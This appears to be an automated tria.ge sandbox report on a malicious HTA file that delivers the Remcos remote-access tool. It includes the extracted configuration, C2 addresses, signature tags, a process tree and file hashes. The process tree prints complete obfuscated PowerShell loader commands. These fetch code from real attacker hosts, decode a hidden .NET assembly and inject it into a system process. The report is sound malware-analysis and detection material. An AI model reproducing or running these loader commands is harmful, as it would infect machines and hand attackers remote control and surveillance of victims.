Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
146s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
11/12/2024, 10:22
General
-
Target
nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta
-
Size
81KB
-
MD5
76277ab4bde108fed474724b88ad0e39
-
SHA1
f73ba378275e5bc2492e53b63c96c22f35599ffc
-
SHA256
62db7e02b51b89f767c5740bb8569668ddcf134b2865959d9fc7a749209d0539
-
SHA512
7a914101c566fcf41b596ceafdde08674a979c9c20731d2e9a1dd0d58cf360204bca82b4680faa684806a5e7e4e88f285cb63bf414fd613878f7281cf60fc5a1
-
SSDEEP
768:tmbUZA+cT/RVeU2Dx6AyZ6LAuAHAbvOx7ze2pe2Ju2x4/mlpu6ae28RWHTuQBwxW:tD
Malware Config
Extracted
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20
Extracted
remcos
RemoteHost
192.3.101.149:6946
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-DESYX7
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Remcos family
-
Blocklisted process makes network request 5 IoCs
-
Evasion via Device Credential Deployment 2 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Suspicious use of SetThreadContext 2 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 16 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of FindShellTrayWindow 25 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lrrjhic1\lrrjhic1.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9BD2.tmp" "c:\Users\Admin\AppData\Local\Temp\lrrjhic1\CSC8DF617BC5B7D4A6A896F143BF45362A1.TMP"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS"4⤵
- Blocklisted process makes network request
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"6⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=iexplore.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.08⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x40,0x108,0x7ffeaa2746f8,0x7ffeaa274708,0x7ffeaa2747189⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,16977714176966175847,9082245553301979907,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:29⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,16977714176966175847,9082245553301979907,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:39⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,16977714176966175847,9082245553301979907,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:89⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16977714176966175847,9082245553301979907,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16977714176966175847,9082245553301979907,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16977714176966175847,9082245553301979907,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,16977714176966175847,9082245553301979907,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:89⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,16977714176966175847,9082245553301979907,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:89⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16977714176966175847,9082245553301979907,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16977714176966175847,9082245553301979907,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16977714176966175847,9082245553301979907,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16977714176966175847,9082245553301979907,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16977714176966175847,9082245553301979907,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,16977714176966175847,9082245553301979907,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:19⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,16977714176966175847,9082245553301979907,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5036 /prefetch:29⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=iexplore.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.08⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeaa2746f8,0x7ffeaa274708,0x7ffeaa2747189⤵
-
-
-
-
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
152B
MD5fab8d8d865e33fe195732aa7dcb91c30
SHA12637e832f38acc70af3e511f5eba80fbd7461f2c
SHA2561b034ffe38e534e2b7a21be7c1f207ff84a1d5f3893207d0b4bb1a509b4185ea
SHA51239a3d43ef7e28fea2cb247a5d09576a4904a43680db8c32139f22a03d80f6ede98708a2452f3f82232b868501340f79c0b3f810f597bcaf5267c3ccfb1704b43
-
Filesize
152B
MD536988ca14952e1848e81a959880ea217
SHA1a0482ef725657760502c2d1a5abe0bb37aebaadb
SHA256d7e96088b37cec1bde202ae8ec2d2f3c3aafc368b6ebd91b3e2985846facf2e6
SHA512d04b2f5afec92eb3d9f9cdc148a3eddd1b615e0dfb270566a7969576f50881d1f8572bccb8b9fd7993724bdfe36fc7633a33381d43e0b96c4e9bbd53fc010173
-
Filesize
264B
MD5b6f7b6880bfc010ea614c6e6288ac8d3
SHA19d69ae10c5fd08e46226443bb2ad42734940b779
SHA256ae588dd0e24b48a5c7bf0b7eba03a3f8bd46148546dffdf5faccd14e1e5e1939
SHA5129a65a1b3df1937a31c029fea8dd5c1f29d03ff14dfb2008680b0f108a9169c03c940d7ad7568a44d6f7d12c6938e55f40bbf4d9aa305e521c2d798ad04980354
-
Filesize
437B
MD505592d6b429a6209d372dba7629ce97c
SHA1b4d45e956e3ec9651d4e1e045b887c7ccbdde326
SHA2563aacb982b8861c38a392829ee3156d05dfdd46b0ecb46154f0ea9374557bc0fd
SHA512caa85bdccabea9250e8a5291f987b8d54362a7b3eec861c56f79cebb06277aa35d411e657ec632079f46affd4d6730e82115e7b317fbda55dacc16378528abaa
-
Filesize
6KB
MD5932cf99032e6f0296e9698db86efa585
SHA16fc554a0d2eb14d3530f65b1074d25ecaa20afb9
SHA256cd666dc759b1b92918c98ee6f6c531833ab0c8554310fb9407508906d96411fa
SHA512a22deb6faef9fd37ad3e9066bb62589e692ef31276b2315a03a98e90558efabce496c7a64a04388c844f3dfe7c64bc41ec74e8dced07440724a408fca159aada
-
Filesize
5KB
MD5ec059108ed93c3911ba87f687da276a6
SHA10b30ce142380185a2e1339ebe183c7d4a2f8e418
SHA256abda8424789d95d3e3b2bd9ca5f3f0871dff4162321d4af3d3399f9009ca56ab
SHA512c6ceed82dcb675c22784e733b8e1604d2422202f2d537daf898a1f917c9edd0839784f923cbdbee79856487ad17de385f7f8780c6554b981ef946201198ac110
-
Filesize
6KB
MD51d87623796889a68c01c894d1802fe6e
SHA189fa05fc5ad968269a4fde32945cdcc74db0d699
SHA2561944d52eb23cb1038ffe70c9e4aa369389b3ea51d554bedad04ca1a34798f76d
SHA51216c2a69b88024739d64c8975a230e99b393e8596fd0783f3864831429f1d88475c1841423739b647787fbe9bfc28532b728417ce4543650b82dff265443ff467
-
Filesize
369B
MD50754a441aa0601937388c470ddcc09f0
